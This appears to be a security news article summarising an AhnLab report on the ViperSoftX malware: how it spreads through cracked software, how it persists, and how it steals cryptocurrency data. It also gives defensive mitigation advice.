ViperSoftX Malware Used by Threat Actors to Steal Sensitive Information

The AhnLab Security Intelligence Center (ASEC) has recently issued a detailed report confirming the persistent distribution of ViperSoftX malware by threat actors, with notable impact on users in South Korea and beyond.

First identified by Fortinet in 2020, ViperSoftX is a sophisticated PowerShell-based malware designed to infiltrate infected systems, execute remote commands, and steal sensitive data, particularly targeting cryptocurrency-related information.

Ongoing Threat Targets Cryptocurrency Users Globally

Disguised as cracked software, key generators, or even eBooks on torrent sites, as reported by Avast (2022), Trend Micro (2023), and Trellix (2024), this malware employs deceptive initial access tactics to ensnare unsuspecting victims worldwide.

The use of such illegal duplication programs as an infection vector remains a prevalent strategy among various cybercriminals, amplifying the reach of ViperSoftX and resulting in widespread infections.

ViperSoftX demonstrates remarkable persistence through the abuse of Windows Task Scheduler to execute malicious PowerShell scripts periodically.

These scripts, often obfuscated or Base64-encrypted, are concealed within files disguised as logs or stored in registry keys like “HKLMSOFTWAREHPgs6ZtP670 / xr417LXh,” acting as downloaders for additional payloads.

These downloaders fetch further malware from command-and-control (C&C) servers using techniques like DNS TXT record queries to dynamically crafted domains.

Once deployed, ViperSoftX communicates with its C&C server via HTTP headers such as “X-User-Agent” and “X-notify,” transmitting detailed system information including computer name, Windows version, and installed antivirus data.

Payload Delivery Mechanisms

Beyond data exfiltration, it monitors clipboard activity to steal BIP39 recovery phrases and cryptocurrency wallet addresses for coins like BTC, ETH, and SOL, while also employing a clipboard protection mechanism to thwart competing ClipBanker malware by terminating suspicious processes.

Additionally, ViperSoftX targets browser extensions and installed programs on platforms like Chrome, Firefox, and Edge, relaying this information to threat actors for further exploitation.

Its capabilities extend to executing commands, downloading executables, and even self-removal to evade detection.

The malware’s arsenal includes secondary payloads like Quasar RAT, an open-source remote access Trojan developed in .NET, alongside commercial tools such as PureCrypter, a packer for additional payload delivery, and PureHVNC, a remote control malware.

These tools enable comprehensive control over infected systems, keylogging, and credential theft.

Moreover, ViperSoftX often deploys ClipBanker, which hijacks cryptocurrency wallet addresses from the clipboard, replacing them with attacker-controlled ones during transactions a tactic exploiting the complexity and randomness of wallet addresses that users typically copy and paste.

ASEC warns that an infection can lead to total system compromise, allowing attackers to extract not only cryptocurrency data but also a wide array of user information.

To mitigate risks, users are urged to avoid downloading software from unverified or suspicious sources, apply the latest security patches, and maintain up-to-date antivirus solutions like V3 products to block known attack vectors.

Indicators of Compromise (IOCs)

To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online – Enroll Here